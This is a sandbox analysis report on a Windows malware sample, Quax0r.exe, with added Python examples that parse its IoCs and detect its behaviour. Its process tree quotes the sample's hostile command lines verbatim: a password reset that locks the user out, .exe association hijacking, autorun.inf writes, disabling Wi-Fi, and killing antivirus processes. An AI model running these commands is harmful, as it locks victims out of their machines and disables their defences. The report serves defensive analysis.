Analysis
- Max time kernel: 150s
- Max time network: 48s
- Platform: windows7_x64
- Resource: win7-20220414-en
- Submitted: 01/06/2022, 09:10
- Static task: static1
- Behavioral task: behavioral1 (sample: Quax0r.exe, resource: win7-20220414-en)
General
- Target: Quax0r.exe
- Size: 16KB
- MD5: 779b96f25a5c23fb88062503290e69ce
- SHA1: 1d3b85c38418d296ced87fb7155e40aad8cb0773
- SHA256: cd1bb0b84729b272e28a48cdfc22ef1f2577e4a1779a9fe871e54cf71707ded8
- SHA512: 7ac94fb7d832302f0aba124f41e168d00e1b3567ff88b7938c25cfb4dd72539e80b56862abf65be99f800d2dec034dbab56be3d5021175a314beee65def9ce3a
Malware Config
Signatures

Drops startup file (1 IoC)
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (process: Quax0r.exe)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials and other secrets.
Drops desktop.ini file(s) (30 IoCs)
All 30 entries are actions of Quax0r.exe.
- File created: C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
- File created: C:\Users\Admin\Favorites\Links for United States\desktop.ini
- File created: C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I7JGZPUA\desktop.ini
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini
- File created: C:\Users\Admin\Favorites\desktop.ini
- File created: C:\Users\Admin\Favorites\Links\desktop.ini
- File created: C:\Users\Admin\Music\desktop.ini
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
- File created: C:\Program Files (x86)\desktop.ini
- File created: C:\Users\Admin\Videos\desktop.ini
- File created: C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2HTZSS82\desktop.ini
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
- File created: C:\Users\Admin\Desktop\desktop.ini
- File created: C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini
- File created: C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini
- File created: C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\N4DR1BTE\desktop.ini
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini
- File created: C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini
- File created: C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini
- File created: C:\Users\Admin\Pictures\desktop.ini
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
- File created: C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D396AG1W\desktop.ini
Drops autorun.inf file (1 TTP)
Malware can abuse Windows AutoRun to spread further via attached volumes.
Drops file in Program Files directory (64 IoCs)
All 64 entries are actions of Quax0r.exe.
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF
- File created: C:\Program Files (x86)\Windows Media Player\es-ES\WMPMediaSharing.dll.mui
- File created: C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FEZIP.POC
- File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\fr\System.Data.Entity.Resources.dll
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPMS.ICO
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\TYPE.WAV
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292278.WMF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\TexturedBlue.css
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\SUBMIT.JS
- File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dll
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107026.WMF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\AUDIOSEARCHLTS.DLL
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostTitle.XSL
- File created: C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF
- File created: C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00169_.GIF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18243_.WMF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\HEADER.GIF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL020.XML
- File created: C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png
- File opened for modification: C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Application Installer.exe
- File opened for modification: C:\Program Files (x86)\Common Files\microsoft shared\PROOF\MSWDS_EN.LEX
- File opened for modification: C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll
- File created: C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\InkObj.dll.mui
- File opened for modification: C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14538_.GIF
- File created: C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\WWINTL.DLL.IDX_DLL
- File created: C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\css\flyout.css
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01297_.GIF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml
- File created: C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\js\settings.js
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00172_.WMF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748G.GIF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Templates\1033\Blog.dotx
- File created: C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png
- File opened for modification: C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RIPPLE\THMBNAIL.PNG
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00045_.WMF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01849_.WMF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\ACEDAO.DLL
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\IPEDINTL.DLL
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\OIS_COL.HXC
- File created: C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\library.js
- File opened for modification: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOICONS.EXE
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0278702.WMF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00704_.WMF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CLASSIC1.WMF
- File opened for modification: C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\JPEGIM32.FLT
- File opened for modification: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PROPLUS\SETUP.XML
- File created: C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll
- File opened for modification: C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0293844.WMF
- File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\fr\UIAutomationClientsideProviders.resources.dll
- File opened for modification: C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\IMCONTACT.DLL
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00105_.WMF
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00382_.WMF
- File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.Entity.dll
- File opened for modification: C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_ja.dll
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART12.BDR
Kills process with taskkill (1 IoC)
- PID 1720: taskkill.exe
Modifies registry class (6 IoCs)
All six writes are made by cmd.exe (the assoc commands in the process tree below):
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.exe
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "RozbehOfSatanFile "
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.bat
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "RozbehOfSatanFile "
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "RozbehOfSatanFile"
Note the trailing space in the .exe and .bat values: cmd splits the line at each "&&" without trimming, so assoc stores "RozbehOfSatanFile " for the first two extensions and "RozbehOfSatanFile" for the last. Anything that hunts for this value has to match both forms. The report shows no Classes\RozbehOfSatanFile key being created, so all three extensions are left pointing at an unregistered ProgID.
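The following is an added example, not part of the sandbox report and not code from the sample: it parses the six IoC lines above, compares each extension's default value with the ProgID Windows normally assigns, and produces the assoc lines that put the defaults back. EXPECTED_DEFAULTS and KNOWN_PROGIDS are assumptions standing in for the live registry (in production KNOWN_PROGIDS would come from querying HKCR for each ProgID).

```python
import re

# The six "Modifies registry class" IoC lines from this report, copied verbatim.
REGISTRY_IOCS = r'''
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.exe cmd.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "RozbehOfSatanFile " cmd.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat cmd.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "RozbehOfSatanFile " cmd.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd cmd.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "RozbehOfSatanFile" cmd.exe
'''

# Default ProgIDs Windows assigns to these extensions (assumed baseline).
EXPECTED_DEFAULTS = {".exe": "exefile", ".bat": "batfile", ".cmd": "cmdfile"}

# ProgIDs that exist under HKCR on the host: a constructed stand-in for a live
# lookup of each ProgID key. The sample registers no "RozbehOfSatanFile" key.
KNOWN_PROGIDS = {"exefile", "batfile", "cmdfile"}

# "Set value (str) <HKLM Classes path>\<ext>\ = "<value>"" as the report prints it.
SET_VALUE_RE = re.compile(
    r'Set value \(str\) \\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\(\.[A-Za-z0-9]+)\\ = "([^"]*)"'
)


def parse_default_values(text):
    """Extension -> default (unnamed) value written under the Classes key."""
    return {ext: value for ext, value in SET_VALUE_RE.findall(text)}


def audit_associations(values, expected=EXPECTED_DEFAULTS, known=KNOWN_PROGIDS):
    """Compare each written association against the expected default ProgID."""
    report = {}
    for ext, value in values.items():
        report[ext] = {
            "value": value,
            "expected": expected.get(ext),
            # strip() so that the trailing-space variant is still recognised as the same hijack
            "hijacked": value.strip() != expected.get(ext),
            "trailing_whitespace": value != value.rstrip(),
            "progid_registered": value.strip() in known,
        }
    return report


def restore_commands(report):
    """cmd builtin lines that put the default ProgIDs back (run elevated: HKLM)."""
    return [f"assoc {ext}={r['expected']}" for ext, r in report.items()
            if r["hijacked"] and r["expected"]]


if __name__ == "__main__":
    findings = audit_associations(parse_default_values(REGISTRY_IOCS))
    for ext, r in findings.items():
        print(ext, r)
    print("\n".join(restore_commands(findings)))
```

Because the shell resolves double-clicked and ShellExecute-launched .exe files through this association, the hijack breaks the normal way of opening programs, while CreateProcess-based launches (an already open command prompt, scheduled tasks, services) are unaffected; the restore lines therefore need a prompt that is already running or was started by a path that does not go through the .exe association.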
Runs net.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
- Token: SeDebugPrivilege, PID 1720, taskkill.exe
This is taskkill.exe enabling SeDebugPrivilege for a forced kill, not a separate action by the sample itself.
Suspicious use of WriteProcessMemory (40 IoCs)
The report lists every write; each parent wrote into each child four times. "target" is the procid_target column, a sandbox-internal identifier rather than a Windows PID.
- PID 1668 (Quax0r.exe) wrote to memory of PID 1328, target 28: 4 writes
- PID 1668 (Quax0r.exe) wrote to memory of PID 1752, target 30: 4 writes
- PID 1668 (Quax0r.exe) wrote to memory of PID 1172, target 31: 4 writes
- PID 1668 (Quax0r.exe) wrote to memory of PID 1444, target 33: 4 writes
- PID 1328 (cmd.exe) wrote to memory of PID 1684, target 35: 4 writes
- PID 1668 (Quax0r.exe) wrote to memory of PID 1284, target 37: 4 writes
- PID 1684 (net.exe) wrote to memory of PID 2020, target 38: 4 writes
- PID 1668 (Quax0r.exe) wrote to memory of PID 360, target 39: 4 writes
- PID 1284 (cmd.exe) wrote to memory of PID 1612, target 42: 4 writes
- PID 360 (cmd.exe) wrote to memory of PID 1720, target 44: 4 writes
Every pair is a parent writing into a child it has just spawned (compare the Processes section), which is consistent with ordinary process creation rather than injection into an unrelated process.
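Added example, not taken from the report: rebuild the process tree from WriteProcessMemory IoC lines of the form the sandbox prints above. It embeds an excerpt of those lines (repeats left in on purpose), checks that the writer PID stated twice on each line agrees, collapses the repeated writes per child, and renders the tree. PROCESS_IMAGES is filled in from the Processes section so that leaf processes, which never appear as writers, can be labelled too.

```python
import re
from collections import Counter

# Excerpt of the "Suspicious use of WriteProcessMemory" IoC lines from this report,
# embedded verbatim so the example runs offline; some of the 4x repeats are kept.
WPM_EXCERPT = """
PID 1668 wrote to memory of 1328 1668 Quax0r.exe 28
PID 1668 wrote to memory of 1328 1668 Quax0r.exe 28
PID 1668 wrote to memory of 1328 1668 Quax0r.exe 28
PID 1668 wrote to memory of 1328 1668 Quax0r.exe 28
PID 1668 wrote to memory of 1752 1668 Quax0r.exe 30
PID 1668 wrote to memory of 1752 1668 Quax0r.exe 30
PID 1668 wrote to memory of 1172 1668 Quax0r.exe 31
PID 1668 wrote to memory of 1444 1668 Quax0r.exe 33
PID 1328 wrote to memory of 1684 1328 cmd.exe 35
PID 1668 wrote to memory of 1284 1668 Quax0r.exe 37
PID 1684 wrote to memory of 2020 1684 net.exe 38
PID 1668 wrote to memory of 360 1668 Quax0r.exe 39
PID 1284 wrote to memory of 1612 1284 cmd.exe 42
PID 360 wrote to memory of 1720 360 cmd.exe 44
"""

# PID -> image name, taken from the Processes section of the report.
PROCESS_IMAGES = {
    1668: "Quax0r.exe", 1328: "cmd.exe", 1684: "net.exe", 2020: "net1.exe",
    1752: "cmd.exe", 1172: "cmd.exe", 1444: "cmd.exe", 1284: "cmd.exe",
    1612: "netsh.exe", 360: "cmd.exe", 1720: "taskkill.exe",
}

# description = "PID <parent> wrote to memory of <child>", then the pid column,
# the writer's image name and the sandbox's internal index of the target.
EDGE_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) (\d+) (\S+) (\d+)")


def parse_edges(text):
    """Return (parent_pid, child_pid, parent_image, target_index) per IoC line."""
    edges = []
    for m in EDGE_RE.finditer(text):
        parent, child, pid_col, image, target = m.groups()
        if parent != pid_col:  # the writer PID is stated twice; they must agree
            raise ValueError(f"inconsistent IoC line: {m.group(0)!r}")
        edges.append((int(parent), int(child), image, int(target)))
    return edges


def edge_counts(edges):
    """How many writes each parent made into each child."""
    return Counter((p, c) for p, c, _, _ in edges)


def build_tree(edges):
    """parent -> unique children in first-seen order, plus writer image names."""
    children, images = {}, {}
    for parent, child, image, _ in edges:
        images[parent] = image
        kids = children.setdefault(parent, [])
        if child not in kids:
            kids.append(child)
    return children, images


def roots(children):
    """Parents that are never themselves written to: the top of each tree."""
    written = {c for kids in children.values() for c in kids}
    return [p for p in children if p not in written]


def render_tree(children, pid, images=None, depth=0):
    """Indented text lines, one per process, depth-first in spawn order."""
    names = dict(PROCESS_IMAGES)
    names.update(images or {})
    lines = [f"{'    ' * depth}{pid} {names.get(pid, '?')}"]
    for child in children.get(pid, []):
        lines.extend(render_tree(children, child, images, depth + 1))
    return lines


if __name__ == "__main__":
    edges = parse_edges(WPM_EXCERPT)
    children, images = build_tree(edges)
    for root in roots(children):
        print("\n".join(render_tree(children, root, images)))
    print(edge_counts(edges).most_common(3))
```

Run against the full 40 lines of the report, the tree has a single root (PID 1668) and ten edges, matching the Processes section below; a write into a PID that is not also a child in the process tree would be the signal worth chasing.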
Processes
Each process is listed under its parent; the number in brackets is its depth in the tree.

[1] C:\Users\Admin\AppData\Local\Temp\Quax0r.exe (PID 1668)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Quax0r.exe"
    - Drops startup file
    - Drops desktop.ini file(s)
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\SysWOW64\cmd.exe (PID 1328)
        Command line: cmd.exe /c net users %username% LOCKEDBYROZBEHOFSATAN
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\net.exe (PID 1684)
            Command line: net users Admin LOCKEDBYROZBEHOFSATAN
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\net1.exe (PID 2020)
                Command line: C:\Windows\system32\net1 users Admin LOCKEDBYROZBEHOFSATAN

    [2] C:\Windows\SysWOW64\cmd.exe (PID 1752)
        Command line: cmd.exe /c assoc .exe=RozbehOfSatanFile && assoc .bat=RozbehOfSatanFile && assoc .cmd=RozbehOfSatanFile
        - Modifies registry class

    [2] C:\Windows\SysWOW64\cmd.exe (PID 1172)
        Command line: cmd.exe /c echo ^[autorun^] > ..\\autorun.inf

    [2] C:\Windows\SysWOW64\cmd.exe (PID 1444)
        Command line: cmd.exe /c echo open^=WindowsScan^.exe >> ..\\autorun.inf

    [2] C:\Windows\SysWOW64\cmd.exe (PID 1284)
        Command line: cmd.exe /c netsh Interface Set Interface Wi-Fi 12 disable
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\netsh.exe (PID 1612)
            Command line: netsh Interface Set Interface Wi-Fi 12 disable

    [2] C:\Windows\SysWOW64\cmd.exe (PID 360)
        Command line: cmd.exe /c taskkill /im chrome.exe /f && taskkill /im WireShark.exe /f && taskkill /im MSASCUI.exe /f && taskkill /im taskmgr.exe /f && taskkill /im regedit.exe /f && taskkill /im Kaspersky.exe /f && taskkill /im msseces.exe /f && taskkill /im nod32.exe /f && taskkill /im msmpeng.exe /f && taskkill /im navapsvc.exe /f && taskkill /im avkwctl.exe /f && taskkill /im fsav32.exe /f && rundll32 keyboard,disable
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\taskkill.exe (PID 1720)
            Command line: taskkill /im chrome.exe /f
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
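The process tree above is the useful part of this report for detection engineering: the sample does everything through cmd.exe one-liners, so every behaviour is visible in a process-creation command line. The following is an added example, not part of the report and not code from the sample, that runs simple command-line rules over events constructed from the tree above (in production the events would be Sysmon event 1 or Security event 4688 with command-line auditing enabled). The rule names and SECURITY_TOOLS list are this example's own choices.

```python
import re

# Image names of security/analysis tools named in the sample's taskkill chain
# (lower-cased; chrome.exe is deliberately absent: it is a browser, not a tool).
SECURITY_TOOLS = {
    "wireshark.exe", "msascui.exe", "taskmgr.exe", "regedit.exe", "kaspersky.exe",
    "msseces.exe", "nod32.exe", "msmpeng.exe", "navapsvc.exe", "avkwctl.exe", "fsav32.exe",
}

# One regex per behaviour seen in the process tree. Each is written to match the
# child's own command line as well as the "cmd.exe /c ..." parent that spawned it.
RULES = [
    # net user <name> <password> (also net1, and the "users" spelling used here);
    # the lookaheads reject switches such as "/add" or "/delete" in either slot.
    ("account_password_set",
     re.compile(r"\bnet1?(?:\.exe)?\s+users?\s+(?!/)\S+\s+(?!/)\S+", re.I)),
    ("exe_association_hijack",
     re.compile(r"\bassoc\s+\.(?:exe|bat|cmd|com)=", re.I)),
    ("autorun_inf_write",
     re.compile(r">{1,2}\s*\S*autorun\.inf\b", re.I)),
    ("network_interface_disable",
     re.compile(r"\bnetsh(?:\.exe)?\s+interface\s+set\s+interface\b.*\bdisable\b", re.I)),
    ("keyboard_disable",
     re.compile(r"\brundll32(?:\.exe)?\s+keyboard\s*,\s*disable\b", re.I)),
]

# taskkill ... /im <image>; [^&|]*? keeps each match inside its own && segment.
TASKKILL_RE = re.compile(r"\btaskkill(?:\.exe)?\b[^&|]*?/im\s+(\S+)", re.I)


def killed_targets(cmdline):
    """Every image a command line asks taskkill to terminate, in order."""
    return [m.group(1).lower() for m in TASKKILL_RE.finditer(cmdline)]


def classify(cmdline):
    """Sorted behaviour tags for one process command line."""
    tags = {name for name, rx in RULES if rx.search(cmdline)}
    targets = killed_targets(cmdline)
    if targets:
        tags.add("process_kill")
        if SECURITY_TOOLS.intersection(targets):
            tags.add("security_tool_kill")
    return sorted(tags)


def triage(events):
    """(pid, tags) for every process-creation event that matched a rule."""
    findings = []
    for e in events:
        tags = classify(e["cmdline"])
        if tags:
            findings.append((e["pid"], tags))
    return findings


# Process-creation events constructed from the Processes section of this report.
EVENTS = [
    {"pid": 1668, "ppid": None, "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\Quax0r.exe"'},
    {"pid": 1328, "ppid": 1668, "cmdline": "cmd.exe /c net users %username% LOCKEDBYROZBEHOFSATAN"},
    {"pid": 1684, "ppid": 1328, "cmdline": "net users Admin LOCKEDBYROZBEHOFSATAN"},
    {"pid": 2020, "ppid": 1684, "cmdline": r"C:\Windows\system32\net1 users Admin LOCKEDBYROZBEHOFSATAN"},
    {"pid": 1752, "ppid": 1668, "cmdline": "cmd.exe /c assoc .exe=RozbehOfSatanFile && assoc .bat=RozbehOfSatanFile && assoc .cmd=RozbehOfSatanFile"},
    {"pid": 1172, "ppid": 1668, "cmdline": r"cmd.exe /c echo ^[autorun^] > ..\\autorun.inf"},
    {"pid": 1444, "ppid": 1668, "cmdline": r"cmd.exe /c echo open^=WindowsScan^.exe >> ..\\autorun.inf"},
    {"pid": 1284, "ppid": 1668, "cmdline": "cmd.exe /c netsh Interface Set Interface Wi-Fi 12 disable"},
    {"pid": 1612, "ppid": 1284, "cmdline": "netsh Interface Set Interface Wi-Fi 12 disable"},
    {"pid": 360, "ppid": 1668, "cmdline": (
        "cmd.exe /c taskkill /im chrome.exe /f && taskkill /im WireShark.exe /f && "
        "taskkill /im MSASCUI.exe /f && taskkill /im taskmgr.exe /f && "
        "taskkill /im regedit.exe /f && taskkill /im Kaspersky.exe /f && "
        "taskkill /im msseces.exe /f && taskkill /im nod32.exe /f && "
        "taskkill /im msmpeng.exe /f && taskkill /im navapsvc.exe /f && "
        "taskkill /im avkwctl.exe /f && taskkill /im fsav32.exe /f && "
        "rundll32 keyboard,disable")},
    {"pid": 1720, "ppid": 360, "cmdline": "taskkill /im chrome.exe /f"},
]

if __name__ == "__main__":
    for pid, tags in triage(EVENTS):
        print(pid, ", ".join(tags))
```

Two caveats a responder should carry from this run. Only the first taskkill (PID 1720, chrome.exe) appears as a child of PID 360: cmd stops an "&&" chain at the first command that fails, so if chrome.exe was not running in the sandbox, the remaining kills and the rundll32 keyboard,disable call never executed here, which is why the rule above matches the parent's full command line rather than waiting for the children. Likewise ..\autorun.inf is relative to the working directory; launched from the user's Temp folder as here it lands in AppData\Local rather than a volume root, and updated Windows 7 no longer honours the open= directive for non-optical removable media, so this is a weak spreading mechanism even when the file lands on a USB drive.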
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 35B
- MD5: 261490e22651f58aeb72b82b148f1e02
- SHA1: f180054e9592561288db216c9fb156a99ad5830f
- SHA256: b12b5eb5be8ef735ed43076e438f438a34adf362a27b187aeba422a4e831b4ba
- SHA512: 83edf93509d5cc5f275c5877bcf571cf5a8716df603783155bb88338008d409ff5041dfb040253c400750e000e51c9eb8c26cb714cd06186ab9b00fc44b2769c
The report does not name this file. Its 35-byte size is consistent with the autorun.inf written by the two echo commands in the process tree (cmd keeps the space before the redirection operator and appends CRLF, giving 12 bytes for the "[autorun]" line and 23 for the "open=WindowsScan.exe" line); treat that as an inference, not something the report states.